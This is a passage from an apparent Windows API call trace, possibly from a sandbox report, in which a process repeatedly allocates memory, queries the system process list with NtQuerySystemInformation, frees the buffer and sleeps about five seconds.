SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.532] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.539] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.563] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.570] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.577] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.585] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.600] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.607] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.621] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.628] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.642] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.650] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.658] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.667] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.675] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 